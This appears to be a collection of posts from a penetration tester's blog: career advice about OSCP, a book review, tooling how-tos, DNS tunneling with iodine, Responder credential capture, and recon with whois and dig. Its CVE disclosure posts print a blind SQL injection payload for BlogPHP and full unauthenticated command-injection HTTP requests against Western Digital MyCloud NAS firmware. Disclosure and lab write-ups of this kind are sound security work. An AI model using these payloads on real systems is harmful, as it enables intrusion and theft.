Interested or Committed

The one thing that changed my life was when I read about interest vs commitment. Too often I hear people wish that things were different, or they want things they will never have or accomplish because they don’t know what it means to be committed to something, so they wander through life like a leaf on a stream never knowing they are holding themselves back and maybe they blame others or circumstance.

This is my reply to someone who asked on Reddit if they should just give up on the OSCP certification.

I’ve been trying to pass the OSCP off and on for the last 9 months. I’ve failed it 3 times, most recently failing last week after going back to the labs and successfully rooting the “hard” boxes. I keep getting closer and closer but can’t root the last box in time.
Since I started the course, I’ve learned more than I ever imagined I would, even going beyond to learn extra things, but it just doesn’t seem like enough. (Before I started I only had about 3 years real experience in IT, but no degree or anything.) I keep getting close but just can’t get over this hump. I’m juggling the challenge with a lot of personal difficulties, and it’s taken a toll on me. I don’t know if I can keep it up. There’s no question that hacking is my passion. It’s what I think about day and night. I even have dreams about coding and things. It brings me joy like nothing else. I don’t know if I can be truly satisfied in life working in any other field. I’ve wanted to be a pen tester since I was a teenager, even started working in IT with that specific goal in mind. “Giving up” isn’t in my nature, but the more I try and fail the more I question if I will have to confront that I’m not fit for this as a profession.
What should I do? I could really use some no-bullshit advice from people already working in the field.
Thanks.

https://www.reddit.com/r/AskNetsec/comments/6n7b70/what_to_do_when_you_feel_like_giving_up_am_i_just/

That tells me that you shouldn’t give up and you should keep trying.

Let me tell you about the revelation that changed my life and led to getting OSCP. Ask yourself if you’re interested or committed. If you’re interested, you’ll make excuses and give up or only do what you said you were going to do when it’s easy or convenient. When you’re committed, you don’t make nor accept any excuses. You’ll find a way to get it done and nothing can stand in your way. It’s a mindset. A few years ago when I was trying to change my life I read about “interested vs committed” and applied it to my life. I stopped sleeping in late and skipping my morning workout. I lost 35 pounds and felt great. I got the CCNA certification that I had been working on for years but never finishing because every time I got close, overtime work would get in the way of studying and I’d put it off.

I got to a point in my career when I realized that all I wanted to do was hack stuff and be a pentester after years of dabbling in it during my IT career. I enrolled in PWK. It was an emotional roller coaster. There were numerous times that I thought that maybe I just wasn’t cut out for being a pentester and I doubted myself. But each time I’d get a good nights sleep and hit it hard the next day and eventually have a breakthrough and root a box in the lab. I was working overtime. I needed some sleep and give my mind a break after an exhausting day at work but I also needed more time for the labs. What did I do? I was committed so I started waking up at 4:30 every weekday morning to work on the PWK lab before work. It didn’t take me 3 tries to pass the OSCP exam, but I did get three lab extensions before I took the test. After each lab time was up I’d take a break for a few weeks to clear my head and focus on learning things that I perceived to be weaknesses then I’d hit the PWK lab again and get further than before.

It didn’t end there. I thought it would be easy getting a pentesting job after getting OSCP. It wasn’t. I wasn’t able to relocate and I was told that nobody wants to let a newbie pentester work remote. Remote work was for experienced pentesters. I didn’t give up because I was committed. I took other security jobs that allowed me to do some pentesting and kept gaining experience. I found 3 zero days in web apps while I was working on sharpening my web app pentesting skills because I knew that was a weakness of mine and I knew that’s where the demand was for pentesting. I added those CVE’s to my resume. I continued to wake up at 4:30 every weekday morning to study, lab, and sharpen my skills. I kept interviewing and failing because I didn’t have consulting experience or I had gaps in my knowledge. Each interview allowed me to realize where I was weak. After each interview I would study and lab more and strengthen those weaknesses. Eventually I was hired to be a pentester. Now I never feel like I’m working because I love what I do. I still wake up at 4:30 every weekday to have quiet time for studying and trying new tools, techniques, and exploits in my lab.

I may never be the smartest person or a rockstar hacker, but I’ll never stop working to improve because I love what I do and I’m committed to it. When I think about retirement, I see myself looking out over a lake view at my laptop and hacking stuff, doing bug bounties instead of bingo.

Are you interested or committed to passing OSCP? Keep on trying harder and best of luck!

Book review – Building Virtual Machine Labs: A Hands-On Guide

AKA: How to break into IT/infosec

I’ve worked in IT for over a decade, and went through that struggle to break into an IT job, and later an infosec job. Everyone that is trying to break into IT or infosec knows the struggle of not being able to get the job because you don’t have experience and can’t get experience because you don’t have the job. There’s ONE reliable way to break through, and that’s to build a home lab and learn the skills on your own time. This allows you to be able to enthusiastically and truthfully answer interview questions, or show competence on the job.

Every interview I’ve done on either side of the table has included the question “tell me about your home lab”. If you’re lacking experience but you can enthusiastically tell me about how you’ve setup a virtual lab on your laptop or spare hardware, configured Active Directory, virtual pfsense firewall, SIEM, Apache/IIS, and hacked it and secured it, then you’ll win points during the interview.

Once you’ve broken into IT or infosec you can’t rest for long. It’s a lifelong learning process and if you don’t continue to learn and do in your personal lab then you’ll likely get left behind and become irrelevant. Yes, a home lab is a must even for seasoned professionals.

This is the book I wish I’d had many years ago when I was googling all of this info and learning it the hard way. The author does an outstanding job of explaining the underlying hardware and software needed for a virtual lab, and walking the reader through setting it all up step by step. There are multiple free hypervisor options to run your lab, and step by step instructions are included for each one.

The books starts out talking about prerequisite knowledge before moving into hardware considerations. Although you can build a lab on your laptop using free hypervisors, this sections gets into hardware choices for professional labs as well as covering how to make the most of the hardware you have.

Next it moves into virtual networks which can be confusing for newcomers trying to understand the difference between NAT, Bridged, and Host-Only adapters and when each choice makes sense to use in your lab. Virtual labs frequently run insecure software that you wouldn’t want to expose to the internet or untrusted network, so you’ll need to understand how to use virtual switches and vNIC’s to segment your network.

The next section is a Hypervisor guide and covers how to setup each, including VMware Fusion/ESXi/Workstation Pro, VirtualBox, and Hyper-V. Then the book gets into step by step instructions on configuring your virtual machines, including a pfSense firewall, Kali Linux, SIEM, IPS, and Metasploitable2. Once you have your lab configured, you’ll need to know how to manage the hosts. This is one of the areas where the book really goes above and beyond by explaining things like persistent static routes, generating ssh keys, helpful commands, and remote access with guides for each OS. Every infosec interview I’ve been in has asked questions about SIEMs. The book covers how to install, configure, and manage the Splunk SIEM which is one of the more popular SIEMs in use. The book ends on a more advanced note, covering malware analysis, pentesting, and IT/OPs lab configurations.

Every time someone has asked me how to break into IT or infosec I’ve always said that you need to get busy in your home lab to build your experience, knowing that building that lab is a pretty big challenge for newcomers. Now you have an excellent book that will hold your hand step by step through the process.

I don’t often buy books because I have a Safari Books Online membership and can read an unlimited number of books online on any device, but this book was well worth the cost and I learned a few things from it even after so many years in the game.

Building Virtual Machine Labs: A Hands-On Guide

Install PowerShell on Kali Linux

I tried to install PowerShell on Kali Linux Rolling by following instructions on the GitHub page as well as other articles I found online and none of them worked. I’m going to tell you what worked for me.

In the past I’ve stuck to Bash and Python for all of my scripting needs because they work cross platform. My work issued laptop runs Windows 10 and I use Git Bash to run my simple shell scripts that I use mainly to slice, dice, and reformat data, and Python for everything else. I’m a big fan of using one cross platform scripting language when possible.

Lately I’ve found a need to dive into PowerShell to be able to understand a complex script that I took over from a departing coworker. I was really surprised at how easy it is to work with XML using PowerShell after struggling to read XML with Python and xmlstarlet. Add in some Unicode and dependency problems while switching back and forth between Python 2.7 and 3.5 and I knew is was time to give PowerShell a chance. This had me thinking about starting a personal project to create a cross platform script in PowerShell to manage pentests and reporting.

Let’s get started installing PowerShell on Kali.

Edit: If you get an error in the next step when installing libicu55 using apt-get, download it from here instead and install using “dpkg -i”. Thanks to caoimhinp and yfnsg for feedback in the comments!

First, open a terminal and run “apt-get install libunwind8 libicu55”. Next you’ll need to download libssl1.0.0 from Debian and install with the command “dpkg -i libssl1.0.0_1.0.1t-1+deb8u6_amd64.deb”. Now you can download the PowerShell Ubuntu 16.04 deb package and install using “dpkg -i powershell_6.0.0-alpha.18-1ubuntu1.16.04.1_amd64.deb”. Now you should be able to enter “powershell” in your terminal to run it.

If you get any errors when using certain Powershell commands, like curl for example, check your aliases. Some common aliases that work by default on Windows aren’t set here. You’ll need to either use the expanded name or set a new alias.

Using Python for IP addresses

Part of the day to day tasks of any Information Security professional may include transforming system input and output text and calculating IP addresses. In this article I demonstrate how use Python to work with IP addresses and transform system input/output.

A system that I manage at work doesn’t allow you to enter networks in CIDR notation like 192.168.0.0/24, it requires starting and ending IP addresses in a range like 192.168.0.1-192.168.0.254. In the past I’ve used ipcalc on Linux to calculate IP addresses when I have something other than a simple netmask to calculate. Today I had a list of IP subnets of various netmasks that I needed to transform into a comma separated list in the format of 192.168.0.1-192.168.0.254, 10.128.0.1-10.128.0.254…

I’m going to use the ipcalc module for Python to demonstrate how to do this. You can install it from an administrator cmd prompt or using root or sudo in a Linux terminal with the following command:

pip install ipcalc

Pretty simple to install. Now lets move on to a demonstration of how to use it. After importing the ipcalc module, I created a new object and attempted to output the first and last host on the network but it didn’t work quite as expected until I cast the output to string.

Python 2.7.12 (v2.7.12:d33e0cf91556, Jun 27 2016, 15:19:22) [MSC v.1500 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> import ipcalc
>>> subnet = ipcalc.Network('192.168.0.0/24')
>>> print subnet.host_first
<bound method Network.host_first of Network('192.168.0.0/24')>
>>> print str(subnet.host_first)
<bound method Network.host_first of Network('192.168.0.0/24')>
>>> print(str(subnet.host_first()))
192.168.0.1
>>> print str(subnet.host_first())
192.168.0.1
>>> print str(subnet.host_last())
192.168.0.254
>>> print str(subnet.broadcast())
192.168.0.255
>>> print str(subnet.info())
PRIVATE
>>> print str(subnet.to_ipv6())
2002:c0a8:0000:0000:0000:0000:0000:0000
>>> print str(subnet.size())
256
>>> ipaddress = ipcalc.IP('192.168.0.128/24')
>>> print str(ipaddress.subnet())
24
>>> print str(ipaddress.info())
PRIVATE
>>> print str(ipaddress.guess_network())
192.168.0.0/24
>>>

Now I’m going to take an input file with a network name followed by network address in CIDR format on each line, cut out just the subnet, and output the networks in firsthost-lasthost,firsthost-lasthost,…” format.

>>> with open('ips.txt') as f:
    content = f.readlines()

    
>>> content = [x.strip() for x in content]

>>> import sys
>>> for x in content:
    subnet = x.split(' ')[-1]
    networkobj = ipcalc.Network(subnet)
    sys.stdout.write("%s-%s," % (str(networkobj.host_first()),str(networkobj.host_last())))

In the code above, I loop through each line of the file and get the last word in the string which is the subnet address. It was necessary to use sys.stdout.write() to get rid of the space between each network start and end addresses using Python 2.7. I’m not going to show you the output. If you want to know my public IP addresses then you’ll have to work to find them yourself. 🙂

I’m sure that there are more than one way to write the code for this exercise. If you have any constructive feedback please leave a comment. Thanks for visiting!

Configure pentest dropbox DNS tunneling

I work for a very large corporation that has many subsidiaries and they are buying up smaller companies. We need to send out a dropbox (Raspberry Pi or Intel NUC) that we could have a remote office plug into the network for internal pentesting and it establishes a ssh tunnel to our server regardless of network restrictions in the remote office.

Initially we used TAP from Trustedsec. TAP first tries to connect to a URL to retrieve a ‘commands.txt’ file that contains commands to run. If you don’t configure that, or if fails to connect to your http/https/ftp server URL, TAP will fail over to ssh and establish an ssh tunnel. We sometimes experienced issues with the dropbox connecting out from networks that required a proxy server and denied ssh outbound.

My solution was to configure the dropbox to tunnel over DNS if the device is unable to establish a connection over TAP.

I’ll leave configuring TAP up to the reader as another pentester installed it and I installed iodine. The TAP github page setup instructions seem easy enough to understand.

Steps to reproduce DNS tunneling using iodine:

Configure DNS:
See the iodine setup guide: http://dev.kryo.se/iodine/wiki/HowtoSetup.
I thought I had missed something when it didn’t work the same day. After waiting for DNS changes to propagate I tried again the following day and it worked. The setup guide has a link to a tunnel tester in the Troubleshooting section.

Download iodine and install. Same steps on client and server:

git clone https://github.com/yarrick/iodine
cd iodine
make
sudo make install

Add iptables rules on your server to allow DNS connections.

sudo iptables -I INPUT 1 -p tcp --dport 53 -j ACCEPT
sudo iptables -I INPUT 2 -p udp --dport 53 -j ACCEPT

Run iodined on the server:

sudo ./iodined -f -c <tunnel IP address> <domain.name.com>

After entering your password for sudo, you’ll be prompted for a password for the tunnel connection. You can add the ‘-P <password>’ option on both client and server to script/automate the connection and avoid being prompted to enter one.
The ‘-f’ option was used to make it run in the foreground for troubleshooting and isn’t necessary once you have it working.
Note that the ‘-c’ option was critical to getting this to work.
The tunnel IP address is the local tunnel IP of your server. It isn’t the actual server IP address, it should be something that isn’t likely to be used on the LAN at either end. I used 10.0.0.1, and the dropbox client automatically received a tunnel IP address of 10.0.0.2. (netmask 255.255.255.224)

Run iodine on the client:

sudo iodine -f -r -P <password> <domain.name.com>

After ssh into the dropbox from my server over the DNS tunnel I was surprised to see that there wasn’t much lag and the connection was usable. I expected the connection to be much slower.

Configure the dropbox to check for a ssh connection over TAP after startup, and if none then start iodine to tunnel over DNS.

Edit: After posting a link to my article on Reddit and seeing some of the responses I realized that some don’t understand how DNS tunneling works and assume that if they block port 53 outbound and only allow network clients to use their internal DNS server then they are blocking DNS tunneling.

Here’s a good read to understand how DNS tunneling works and how to detect it. (I recommend Bro for DNS traffic analysis.) https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152

Two relevant sections of the paper that are critical to understanding how DNS tunneling works:

With this hierarchical system a given domain owner can define the authoritative servers for their domain. This means that they are in control of the ultimate destination host for DNS queries for their domain. In a typical enterprise, endpoints do not make DNS requests directly to the internet. They have internal DNS servers that provide DNS services to an endpoint. However, given that DNS will forward their requests until the authoritative name server is contacted, an attacker with access on an internal endpoint can leverage the enterprise‘s DNS infrastructure for DNS tunneling to a domain that they control.

The last core technique is to encode data in DNS payloads. This is an area where the specifics of each utility vary widely. From a high level simplified point of view, the client wants to send data to server. It will encode that data in the DNS payload. For example the client could send an ‗A‘ record request where the data is encoded the in host
name: MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI.t.example.com. The server could respond with an answer as a CNAME response:
NVWW2IDPOZQWY5DJNZSQ.t.example.com. In this way any data can be encoded
and sent to the server. The server can also respond with any data. If there is a need for the server to initiate a communication, it cannot be done directly. Clients do not have a service listening for DNS requests and are typically behind a firewall. Server initiated
communication can however be accomplished by having the client regularly poll the server. Then, if the server has data for the client it can send it as a response to the polling requests.

Responder – spoofing LLMNR and NBT-NS to capture password hashes

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.” Download from https://github.com/SpiderLabs/Responder

One cool thing I didn’t cover in the video is how to force a basic authentication login prompt to capture plain text credentials by using the command line so that we don’t have to crack anything. This would be useful to try after an initial run with Responder doesn’t provide any password hashes that we are able to crack.

responder -I eth0 -r -w -b -F --lm -v

 

Of course the victim will see a prompt for login and password and we’re hoping that they will authenticate.

Check out my video below to see how to install Responder, and how to capture and crack the password hashes.

My first CVE-2016-1000329 in BlogPHP

While the affected software, BlogPHP isn’t in widespread use (at least I hope not!) and it’s outdated and abandoned by the developer, this find means a lot to me because it’s my first CVE. This vulnerability has also been overlooked by many people for years, including those that worked on the Breach 2.1 vulnhub challenge. Breach 2.1 is a boot2root/CTF challenge which attempts to showcase a real-world scenario penetration test. My full write-up of my pentest of Breach can be found here.

I used a XSS exploit to steal the admin’s cookie which should have allowed me to login as admin but it didn’t work. Knowing that the admin user was logging in to a blog hosted on the same host I decided to take a look at the HTTP headers to see if I needed to change something in the “Referer” field in order for the stolen cookie to allow me to login as admin. I initially tried changing it to localhost and 127.0.0.1 with no success.

While fuzzing the HTTP header “Referer” field I discovered a blind SQL injection. Using an input of ‘+(select*from(select(sleep(20)))a)+’ including single quotes results in a delay of 20 seconds to page render. I was able to further exploit the vulnerability using sqlmap. I saved the request from Burp Suite to a text file and exploited it with sqlmap using “sqlmap -r req.txt –level=5 –risk=3”.

I submitted my CVE request through Mitre who notified me that “The Distributed Weakness Filing (DWF) Project is the CVE Numbering
Authority (CNA) currently responsible for assigning CVE IDs to open
source software vulnerabilities that are outside of the current CVE
coverage goals listed at
http://cve.mitre.org/cve/data_sources_product_coverage.html.”

CVE listing for CVE-2016-1000329 on DWF.

Command Injection vulnerability in Western Digital MyCloud NAS

The software version of my device is 2.11.142 and my device says that it’s up to date.

The first command injection vulnerability is in the home page URL, “/” in index.php Cookie. To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.

The request:

GET / HTTP/1.1
Host: wdmycloudex2
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1

I deleted the PHPSESSID from the cookie and it still worked without any authentication.

The next one was in the /web/google_analytics.php URL.

POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://wdmycloudex2/
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close
cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23

I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.

I submitted the vulnerabilities to Western Digital on 10/8/2016 and received word that they released a firmware update to remediate on 12/13/2016. These vulnerabilities have been submitted to Mitre for CVE assignment.

Update 1/3/2017: Mitre assigned CVE’s CVE-2016-10107 and CVE-2016-10108.

Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they released a firmware patch. They only patched 2016-10108.

On 12/29/2016:

On 1/9/2017:

Passive Information Gathering

I prepared this presentation for the 757 White Hat Hackers meeting on 10/26 where I presented on Passive Information Gathering. Passive Information Gathering is simply reconnaissance methods that don’t touch the target and leave any traces of your presence.

Topics:

  • Whois
  • Dig
  • Recon-ng
  • Theharvester
  • Network-tools.com
  • Netcraft Toolbar
  • SiteDigger
  • Shodan
  • Maltego

Whois

Whois is usually installed in all Linux systems and returns the following domain information:

Registrar: The company/organization that registered the domain on behalf of the domain’s owner.
Name Servers: The servers that control the domain’s DNS.
Creation Date: The date the domain was originally registered.
Expiration Date: When the domain will expire.
Contacts: Publicly accessible information, required by registrars

Usage: “whois <domainName>”

root@DESKTOP-7ETQJM7:~# whois nasa.gov
% DOTGOV WHOIS Server ready
 Domain Name: NASA.GOV
 Status: ACTIVE

>>> Last update of whois database: 2016-10-28T17:55:42Z <<<
Please be advised that this whois server only contains information pertaining
to the .GOV domain. For information for other domains please use the whois
server at RS.INTERNIC.NET.
root@DESKTOP-7ETQJM7:~# whois yahoo.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

 Server Name: YAHOO.COM.ACCUTAXSERVICES.COM
 IP Address: 98.136.43.32
 IP Address: 66.196.84.168
 Registrar: WILD WEST DOMAINS, LLC
 Whois Server: whois.wildwestdomains.com
 Referral URL: http://www.wildwestdomains.com


 Server Name: YAHOO.COM.ANGRYPIRATES.COM
 IP Address: 8.8.8.8
 Registrar: NAME.COM, INC.
 Whois Server: whois.name.com
 Referral URL: http://www.name.com


 Server Name: YAHOO.COM.AU
 Registrar: WILD WEST DOMAINS, LLC
 Whois Server: whois.wildwestdomains.com
 Referral URL: http://www.wildwestdomains.com


 Server Name: YAHOO.COM.BGPETERSON.COM
 IP Address: 66.218.71.205
 Registrar: TUCOWS DOMAINS INC.
 Whois Server: whois.tucows.com
 Referral URL: http://www.tucowsdomains.com


 Server Name: YAHOO.COM.BIGROCK.IN
 Registrar: BIGROCK SOLUTIONS LIMITED
 Whois Server: Whois.bigrock.com
 Referral URL: http://www.bigrock.com


 Server Name: YAHOO.COM.BR
 Registrar: ENOM, INC.
 Whois Server: whois.enom.com
 Referral URL: http://www.enom.com


 Server Name: YAHOO.COM.CN
 Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
 Whois Server: whois.dns.com.cn
 Referral URL: http://www.dns.com.cn


 Server Name: YAHOO.COM.DALLARIVA.COM
 IP Address: 66.218.71.205
 Registrar: DOMAIN.COM, LLC
 Whois Server: whois.domain.com
 Referral URL: http://www.domain.com


 Server Name: YAHOO.COM.ELPOV.COM
 IP Address: 66.21.71.205
 Registrar: TIERRANET INC. D/B/A DOMAINDISCOVER
 Whois Server: whois.domaindiscover.com
 Referral URL: http://www.domaindiscover.com


 Server Name: YAHOO.COM.HACKED.BY.JAPTRON.ES
 Registrar: GODADDY.COM, LLC
 Whois Server: whois.godaddy.com
 Referral URL: http://www.godaddy.com


 Server Name: YAHOO.COM.HK
 Registrar: ENOM, INC.
 Whois Server: whois.enom.com
 Referral URL: http://www.enom.com


 Server Name: YAHOO.COM.IS.N0T.AS.1337.AS.SEARCH.GULLI.COM
 IP Address: 80.190.192.24
 Registrar: COREHUB, S.R.L.
 Whois Server: whois.corehub.net
 Referral URL: http://corehub.net


 Server Name: YAHOO.COM.JTNELECTRIC.COM
 IP Address: 66.218.71.205
 IP Address: 216.109.116.20
 Registrar: GODADDY.COM, LLC
 Whois Server: whois.godaddy.com
 Referral URL: http://www.godaddy.com


 Server Name: YAHOO.COM.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
 IP Address: 203.36.226.2
 Registrar: INSTRA CORPORATION PTY, LTD.
 Whois Server: whois.instra.net
 Referral URL: http://www.instra.com


 Server Name: YAHOO.COM.MX
 Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 Whois Server: whois.PublicDomainRegistry.com
 Referral URL: http://www.publicdomainregistry.com


 Server Name: YAHOO.COM.MY
 Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 Whois Server: whois.PublicDomainRegistry.com
 Referral URL: http://www.publicdomainregistry.com


 Server Name: YAHOO.COM.SG
 Registrar: DOTSTER, INC.
 Whois Server: whois.dotster.com
 Referral URL: http://www.dotster.com


 Server Name: YAHOO.COM.TW
 Registrar: GODADDY.COM, LLC
 Whois Server: whois.godaddy.com
 Referral URL: http://www.godaddy.com


 Server Name: YAHOO.COM.TWIXTEARS.COM
 IP Address: 66.218.71.205
 Registrar: DOMAIN.COM, LLC
 Whois Server: whois.domain.com
 Referral URL: http://www.domain.com


 Server Name: YAHOO.COM.VIRGINCHASSIS.COM
 IP Address: 66.218.71.205
 Registrar: DOMAIN.COM, LLC
 Whois Server: whois.domain.com
 Referral URL: http://www.domain.com


 Server Name: YAHOO.COM.VN
 Registrar: MELBOURNE IT, LTD. D/B/A INTERNET NAMES WORLDWIDE
 Whois Server: whois.melbourneit.com
 Referral URL: http://www.melbourneit.com.au


 Server Name: YAHOO.COM.ZZZZZ.GET.LAID.AT.WWW.SWINGINGCOMMUNITY.COM
 IP Address: 69.41.185.196
 Registrar: TUCOWS DOMAINS INC.
 Whois Server: whois.tucows.com
 Referral URL: http://www.tucowsdomains.com


 Server Name: YAHOO.COM.ZZZZZZ.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
 IP Address: 203.36.226.2
 Registrar: INSTRA CORPORATION PTY, LTD.
 Whois Server: whois.instra.net
 Referral URL: http://www.instra.com


 Server Name: YAHOO.COM.ZZZZZZZ.GET.ONE.MILLION.DOLLARS.AT.WWW.UNIMUNDI.COM
 IP Address: 209.126.190.70
 Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
 Whois Server: whois.PublicDomainRegistry.com
 Referral URL: http://www.publicdomainregistry.com


 Domain Name: YAHOO.COM
 Registrar: MARKMONITOR INC.
 Sponsoring Registrar IANA ID: 292
 Whois Server: whois.markmonitor.com
 Referral URL: http://www.markmonitor.com
 Name Server: NS1.YAHOO.COM
 Name Server: NS2.YAHOO.COM
 Name Server: NS3.YAHOO.COM
 Name Server: NS4.YAHOO.COM
 Name Server: NS5.YAHOO.COM
 Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
 Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
 Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
 Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
 Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
 Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
 Updated Date: 26-aug-2015
 Creation Date: 18-jan-1995
 Expiration Date: 19-jan-2023

>>> Last update of whois database: Fri, 28 Oct 2016 17:56:10 GMT <<<

For more information on Whois status codes, please visit https://icann.org/epp

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: yahoo.com
Registry Domain ID: 3643624_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2015-08-26T15:30:44-0700
Creation Date: 1995-01-18T00:00:00-0800
Registrar Registration Expiration Date: 2023-01-18T21:00:00-0800
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2083895740
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)
Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)
Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)
Registry Registrant ID:
Registrant Name: Domain Administrator
Registrant Organization: Yahoo! Inc.
Registrant Street: 701 First Avenue
Registrant City: Sunnyvale
Registrant State/Province: CA
Registrant Postal Code: 94089
Registrant Country: US
Registrant Phone: +1.4083493300
Registrant Phone Ext:
Registrant Fax: +1.4083493301
Registrant Fax Ext:
Registrant Email: domainadmin@yahoo-inc.com
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: Yahoo! Inc.
Admin Street: 701 First Avenue
Admin City: Sunnyvale
Admin State/Province: CA
Admin Postal Code: 94089
Admin Country: US
Admin Phone: +1.4083493300
Admin Phone Ext:
Admin Fax: +1.4083493301
Admin Fax Ext:
Admin Email: domainadmin@yahoo-inc.com
Registry Tech ID:
Tech Name: Domain Administrator
Tech Organization: Yahoo! Inc.
Tech Street: 701 First Avenue
Tech City: Sunnyvale
Tech State/Province: CA
Tech Postal Code: 94089
Tech Country: US
Tech Phone: +1.4083493300
Tech Phone Ext:
Tech Fax: +1.4083493301
Tech Fax Ext:
Tech Email: domainadmin@yahoo-inc.com
Name Server: ns4.yahoo.com
Name Server: ns2.yahoo.com
Name Server: ns1.yahoo.com
Name Server: ns5.yahoo.com
Name Server: ns3.yahoo.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2016-10-28T10:52:20-0700 <<<

The Data in MarkMonitor.com's WHOIS database is provided by MarkMonitor.com for
information purposes, and to assist persons in obtaining information about or
related to a domain name registration record. MarkMonitor.com does not guarantee
its accuracy. By submitting a WHOIS query, you agree that you will use this Data
only for lawful purposes and that, under no circumstances will you use this Data to:
 (1) allow, enable, or otherwise support the transmission of mass unsolicited,
 commercial advertising or solicitations via e-mail (spam); or
 (2) enable high volume, automated, electronic processes that apply to
 MarkMonitor.com (or its systems).
MarkMonitor.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by this policy.

MarkMonitor is the Global Leader in Online Brand Protection.

MarkMonitor Domain Management(TM)
MarkMonitor Brand Protection(TM)
MarkMonitor AntiPiracy(TM)
MarkMonitor AntiFraud(TM)
Professional and Managed Services

Visit MarkMonitor at http://www.markmonitor.com
Contact us at +1.8007459229
In Europe, at +44.02032062220

For more information on Whois status codes, please visit
 https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en

Dig

Domain Internet Groper

Options:

root@DESKTOP-7ETQJM7:~# dig -h
Usage: dig [@global-server] [domain] [q-type] [q-class] {q-opt}
 {global-d-opt} host [@local-server] {local-d-opt}
 [ host [@local-server] {local-d-opt} [...]]
Where: domain is in the Domain Name System
 q-class is one of (in,hs,ch,...) [default: in]
 q-type is one of (a,any,mx,ns,soa,hinfo,axfr,txt,...) [default:a]
 (Use ixfr=version for type ixfr)
 q-opt is one of:
 -x dot-notation (shortcut for reverse lookups)
 -i (use IP6.INT for IPv6 reverse lookups)
 -f filename (batch mode)
 -b address[#port] (bind to source address/port)
 -p port (specify port number)
 -q name (specify query name)
 -t type (specify query type)
 -c class (specify query class)
 -k keyfile (specify tsig key file)
 -y [hmac:]name:key (specify named base64 tsig key)
 -4 (use IPv4 query transport only)
 -6 (use IPv6 query transport only)
 -m (enable memory usage debugging)
 d-opt is of the form +keyword[=value], where keyword is:
 +[no]vc (TCP mode)
 +[no]tcp (TCP mode, alternate syntax)
 +time=### (Set query timeout) [5]
 +tries=### (Set number of UDP attempts) [3]
 +retry=### (Set number of UDP retries) [2]
 +domain=### (Set default domainname)
